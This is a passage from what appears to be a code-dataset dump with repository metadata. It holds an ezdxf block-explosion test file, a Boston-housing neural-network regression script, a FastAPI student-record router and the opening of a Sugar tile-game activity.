len(exploded_entities) == 2\n assert len(msp) == 3 # 2 INSERT - 1 exploded INSERT + 2 LINE\n\n e = exploded_entities[0]\n # Exploded entities should be stored in the entity database.\n assert e.dxf.handle is not None, 'entity should have a handle'\n assert e.dxf.handle in entitydb\n # Exploded entities should reside in a layout.\n assert e.dxf.owner is not None, 'entity should have an owner'\n assert e.dxf.owner is blockref_owner\n # Exploded entities should be assigned to the same document as the block reference.\n assert e.doc is doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (1, 0)\n\n e = exploded_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (0, 1)\n\n\ndef test_03_explode_polyline_bulge(doc, msp):\n blk = doc.blocks.new('Test03')\n blk.add_lwpolyline([(0, 0), (3, 0, 0.5), (6, 0), (9, 0)], format='xyb')\n block_ref = msp.add_blockref('Test03', insert=(0, 0), dxfattribs={\n 'yscale': 0.5,\n })\n entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n e = entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (0, 0)\n assert e.dxf.end == (3, 0)\n\n e = entities[1]\n e = cast(Ellipse, e)\n assert e.dxftype() == 'ELLIPSE'\n assert e.dxf.center.isclose((4.5, 0.5625, 0))\n assert e.dxf.major_axis.isclose((1.875, 0.0, 0))\n assert e.dxf.ratio == 0.5\n assert math.isclose(e.dxf.start_param, -2.498091544796509 % math.tau)\n assert math.isclose(e.dxf.end_param, -0.6435011087932843 % math.tau)\n assert e.start_point.isclose(Vector(3, 0, 0))\n assert e.end_point.isclose(Vector(6, 0, 0), abs_tol=1e-5)\n\n e = entities[2]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (6, 0)\n assert e.dxf.end == (9, 0)\n\n\ndef test_04_explode_blockref_with_attrib(doc, msp, entitydb):\n blockref = msp.add_blockref('Test1', (20, 10)) # with attrib\n blockref.add_attrib(tag='TAG', text='Text', insert=(1.5, 2.6))\n assert len(blockref.attribs) == 1, 'Error in add_attrib()'\n attrib = blockref.attribs[0]\n\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert attrib.is_alive is False, 'Exploded attribs should be destroyed.'\n assert len(exploded_entities) == 3, '2x LINE and 1x TEXT'\n text = exploded_entities[-1]\n assert text.dxftype() == 'TEXT'\n assert text.dxf.text == 'Text'\n assert text.dxf.insert == (1.5, 2.6), 'ATTRIB already located in WCS'\n\n\ndef test_05_examine_uniform_scaled_ellipse(doc, msp):\n blk = doc.blocks.new('EllipseBlk')\n blk.add_ellipse((0, 0), major_axis=(2, 0), ratio=0.5)\n blkref = msp.add_blockref('EllipseBlk', insert=(2, 2)).scale(2)\n ellipse = list(blkref.virtual_entities())[0]\n assert ellipse.dxftype() == 'ELLIPSE'\n assert ellipse.dxf.center == (2, 2)\n assert ellipse.dxf.major_axis == (4, 0)\n assert ellipse.dxf.ratio == 0.5\n\n\ndef test_06_skipped_entities_callback(doc, msp):\n blk = doc.blocks.new('test_block')\n hatch = blk.add_hatch()\n edge_path = hatch.paths.add_edge_path()\n edge_path.add_arc((0, 0))\n blk.add_line((0, 0), (1, 0))\n blkref = msp.add_blockref('test_block', insert=(0, 0)).place((0, 0), (1, 2, 3))\n skipped_entities = []\n\n def on_entity_skipped(entity, reason):\n skipped_entities.append((entity, reason))\n\n assert not blkref.has_uniform_scaling\n assert hatch.paths.has_critical_elements()\n entities = list(blkref.virtual_entities(non_uniform_scaling=True, skipped_entity_callback=on_entity_skipped))\n\n assert len(entities) == 1\n assert entities[0].dxftype() == 'LINE'\n assert len(skipped_entities) == 1\n assert skipped_entities[0][0].dxftype() == 'HATCH'\n assert skipped_entities[0][1] == 'unsupported non-uniform scaling'\n\n\ndef _get_transformed_curve(scale_factors: Vector, rotation: float, is_arc: bool) -> Union[Ellipse, Arc]:\n doc = ezdxf.new()\n blk = doc.blocks.new('block')\n if is_arc:\n blk.add_arc((0, 0), radius=1, start_angle=0, end_angle=math.degrees(math.pi / 2))\n else:\n blk.add_ellipse((0, 0), major_axis=(1, 0), ratio=1, start_param=0, end_param=math.pi / 2)\n\n assert blk[0].start_point.isclose(Vector(1, 0, 0))\n assert blk[0].end_point.isclose(Vector(0, 1, 0))\n\n blk.add_point((1, 0))\n blk.add_point((0, 1))\n block_ref = doc.modelspace().add_blockref('block', insert=(0, 0), dxfattribs={\n 'xscale': scale_factors.x, 'yscale': scale_factors.y, 'zscale': scale_factors.z,\n 'rotation': math.degrees(rotation)\n })\n entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n if is_arc and block_ref.has_uniform_scaling:\n assert entities[0].dxftype() == 'ARC'\n else:\n assert entities[0].dxftype() == 'ELLIPSE'\n ellipse = cast(Union[Ellipse, Arc], entities[0])\n\n # points should have been transformed the same as the ellipse\n assert entities[1].dxftype() == 'POINT'\n start_point = cast(Point, entities[1])\n assert start_point.dxf.location.isclose(ellipse.start_point)\n assert entities[2].dxftype() == 'POINT'\n end_point = cast(Point, entities[2])\n assert end_point.dxf.location.isclose(ellipse.end_point)\n\n return ellipse\n\n\ndef _check_curve(ellipse: Ellipse, expected_start: Vector, expected_end: Vector, expected_extrusion: Vector):\n assert ellipse.start_point.isclose(expected_start)\n assert ellipse.end_point.isclose(expected_end)\n assert ellipse.dxf.extrusion.isclose(expected_extrusion)\n\n\n# TODO: currently zscale=-1 is failing\n#@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True), (-1, False), (-1, True)])\n@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True)])\ndef test_07_rotated_and_reflected_curves(zscale, is_arc):\n scale = Vector(1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n\n@pytest.mark.parametrize('stretch,is_arc', [(0.5, False), (0.5, True)])\ndef test_08_rotated_and_reflected_and_stretched_curves(stretch, is_arc):\n scale = Vector(1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n", "repo_name": "DatacloudIntl/dc_ezdxf", "sub_path": "tests/test_04_dxf_high_level_structs/test_414_explode_blockrefs.py", "file_name": "test_414_explode_blockrefs.py", "file_ext": "py", "file_size_in_byte": 13798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ezdxf.new", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 122, "usage_type": "call"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 122, "usage_type": "argument"}, {"api_name": "math.isclose", "line_number": 127, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 127, "usage_type": "attribute"}, {"api_name": "math.isclose", "line_number": 128, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 128, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 129, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 130, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.new", "line_number": 189, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 192, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 192, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 194, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 196, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 197, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 203, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 212, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Arc", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 216, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 216, "usage_type": "argument"}, {"api_name": "typing.cast", "line_number": 219, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 219, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Arc", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 235, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 238, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 240, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 241, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 243, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 244, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 246, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 247, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 249, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 252, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 255, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 257, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 258, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 260, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 261, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 263, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 266, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 268, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 269, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 271, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 272, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 275, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 277, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 280, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 282, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 283, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 285, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 286, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 288, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 289, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 294, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 297, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 299, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 300, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 302, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 303, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 305, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 306, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 308, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 311, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 313, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 314, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 316, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 317, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 319, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 320, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 322, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 325, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 327, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 328, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 331, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 333, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 334, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 336, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 339, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 341, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 342, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 344, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 345, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 347, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 348, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 292, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 352, "usage_type": "call"}]} +{"seq_id": "12878303693", "text": "import numpy as np\nimport pandas as pd\nimport multiLayerPerceptron.MLP_layer as layer\nfrom multiLayerPerceptron.MLP_network import MultiLayerPerceptron\nfrom sklearn.datasets import load_boston\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import KFold \nfrom sklearn.preprocessing import MinMaxScaler \nimport math \nfrom metrics import *\n\nX = load_boston().data\ny= load_boston().target\nscalar = MinMaxScaler()\nscalar.fit(X)\nX = scalar.transform(X)\nX = X.reshape(X.shape[0], 1, 13)\nX = X.astype('float32')\n\n# Defining the Network\nnet = MultiLayerPerceptron()\nnet.add(layer.FullyConnectedLayer(13, 40)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(40, 13)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(13, 1)) \n\nkf = KFold(n_splits=3)\n\ni = 1\nov_rmse = 0\nnet.use(layer.mse, layer.mse_prime)\nfor train_index, test_index in kf.split(X):\n X_train = X[train_index]\n y_train = y[train_index]\n X_test = X[test_index]\n y_test = y[test_index]\n\n net.fit(X_train, y_train, epochs=100, learning_rate=3e-3)\n y_hat = net.predict(X_test)\n rmse_curr = rmse(pd.Series(y_hat),pd.Series(y_test))\n print(f\"RMSE error for Fold {i}:\", rmse_curr)\n ov_rmse += rmse_curr\n i+=1\n\nprint(\"Overall RMSE:\", ov_rmse/3)\n\n\n", "repo_name": "AdityaPusalkar/assignment-3-AdityaPusalkar", "sub_path": "q6b.py", "file_name": "q6b.py", "file_ext": "py", "file_size_in_byte": 1413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_boston", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_boston", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 15, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_network.MultiLayerPerceptron", "line_number": 22, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 23, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 23, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 24, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 24, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 25, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 25, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 26, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 26, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 27, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 29, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse", "line_number": 33, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 33, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse_prime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "18020203725", "text": "from typing import List\nfrom fastapi import APIRouter, HTTPException\nfrom app.models.Alumno import Alumno\nimport logging\n\nlogger = logging.getLogger(__name__)\nrouter = APIRouter(prefix=\"/alumnos\",\n tags=[\"alumnos\"], )\n\n\n@router.get(\"/\", response_model=List[Alumno])\ndef alumnos_get_all():\n # alumnos = Alumno.get_all()\n alumnos = []\n logger.info('alumnos %s', alumnos)\n\n return alumnos\n\n\n@router.get('/{alumno_id}', response_model=Alumno)\ndef get_detail(alumno_id: int):\n alumno = Alumno.get_by_id(alumno_id)\n if alumno is None:\n raise HTTPException(status_code=404, detail=f\"Alumno con id:{alumno_id} not found\")\n\n return alumno\n\n\n@router.put('/{persona_id}', response_model=Alumno)\ndef update_detail(alumno_id: int, alumno: Alumno):\n alumno_original = Alumno.get_by_id(alumno_id)\n print(alumno)\n return alumno\n", "repo_name": "cids-arquitectura/fastapi_microservice", "sub_path": "app/routes/alumnos.py", "file_name": "alumnos.py", "file_ext": "py", "file_size_in_byte": 867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", "line_number": 7, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 22, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 24, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 30, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 31, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 31, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "44034596500", "text": "from gettext import gettext as _\n\nimport logging\n_logger = logging.getLogger('paths-activity')\n\nfrom sugar3.graphics import style\nGRID_CELL_SIZE = style.GRID_CELL_SIZE\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\n\nfrom grid import Grid\nfrom hand import Hand\nfrom deck import Deck\nfrom tile import error_graphic, highlight_graphic, blank_tile\nfrom utils import json_dump\nfrom constants import ROW, COL, NORTH, EAST, SOUTH, WEST, TILE_WIDTH, \\\n TILE_HEIGHT, HIDE, BOARD, GRID, TILES, TOP, OVER_THE_TOP\nfrom sprites import Sprites\n\nOFFSETS = [-COL, 1, COL, -1]\nMY_HAND = 0\nROBOT_HAND = 1\n\n\nclass Game():\n\n def __init__(self, canvas, parent=None, colors=['#A0FFA0', '#FF8080']):\n self._activity = parent\n self.colors = colors\n\n # Starting from command line\n if parent is None:\n self._running_sugar = False\n self._canvas = canvas\n else:\n self._running_sugar = True\n self._canvas = canvas\n parent.show_all()\n\n self._canvas.set_can_focus(True)\n self._canvas.add_events(Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK |\n Gdk.EventMask.POINTER_MOTION_MASK)\n self._canvas.connect(\"draw\", self._draw_cb)\n self._canvas.connect(\"button-press-event\", self._button_press_cb)\n self._canvas.connect(\"button-release-event\", self._button_release_cb)\n self._canvas.connect(\"motion-notify-event\", self._mouse_move_cb)\n self._canvas.connect(\"key_press_event\", self._keypress_cb)\n\n self._width = Gdk.Screen.width()\n self._height = Gdk.Screen.height() - (GRID_CELL_SIZE * 1.5)\n self._scale = self._height / (8.0 * TILE_HEIGHT)\n self.tile_width = TILE_WIDTH * self._scale\n self.tile_height = TILE_HEIGHT * self._scale\n\n # Generate the sprites we'll need...\n self._sprites = Sprites(self._canvas)\n self.grid = Grid(self._sprites, self._width, self._height,\n self.tile_width, self.tile_height, self._scale,\n colors[0])\n self.deck = Deck(self._sprites, self._scale, colors[1])\n self.deck.board.move((self.grid.left, self.grid.top))\n self.hands = []\n self.hands.append(Hand(self.tile_width, self.tile_height))\n self._errormsg = []\n for i in range(4):\n self._errormsg.append(error_graphic(self._sprites))\n self._highlight = highlight_graphic(self._sprites, self._scale)\n self._score_card = blank_tile(self._sprites, scale=self._scale * 2,\n color=colors[1])\n self._score_card.set_label_attributes(64)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n\n # and initialize a few variables we'll need.\n self.buddies = []\n self._my_hand = MY_HAND\n self.playing_with_robot = False\n self._all_clear()\n\n def _all_clear(self):\n ''' Things to reinitialize when starting up a new game. '''\n self._hide_highlight()\n self._hide_errormsgs()\n self.deck.hide()\n self.deck.clear()\n self.grid.clear()\n for hand in self.hands:\n hand.clear()\n self.show_connected_tiles()\n\n self._press = None\n self._release = None\n self._dragpos = [0, 0]\n self._total_drag = [0, 0]\n self.last_spr_moved = None\n self._last_tile_played = None\n self._last_tile_orientation = 0\n self._last_grid_played = None\n\n self.whos_turn = MY_HAND\n self._waiting_for_my_turn = False\n self._waiting_for_robot = False\n self.placed_a_tile = False\n self._there_are_errors = False\n\n self.score = 0\n self._score_card.set_layer(HIDE)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n self.saw_game_over = False\n\n def _initiating(self):\n if not self._running_sugar:\n return True\n return self._activity.initiating\n\n def new_game(self, saved_state=None, deck_index=0):\n ''' Start a new game. '''\n self._all_clear()\n\n # If we are not sharing or we are the sharer...\n if not self.we_are_sharing() or self._initiating():\n # Let joiners know we are starting a new game...\n if self.we_are_sharing():\n self._activity.send_event(\"n\", \" \")\n\n # The initiator shuffles the deck...\n self.deck.shuffle()\n # ...and shares it.\n if self.we_are_sharing():\n self._activity.send_event(\"d\", self.deck.serialize())\n\n # Deal a hand to yourself...\n self.hands[self._my_hand].deal(self.deck)\n\n # ...deal a hand to the robot...\n if self.playing_with_robot:\n if len(self.hands) < ROBOT_HAND + 1:\n self.hands.append(Hand(self.tile_width, self.tile_height,\n remote=True))\n self.hands[ROBOT_HAND].deal(self.deck)\n # ...or deal hands to the joiners.\n elif len(self.buddies) > 1:\n for i, buddy in enumerate(self.buddies):\n if buddy != 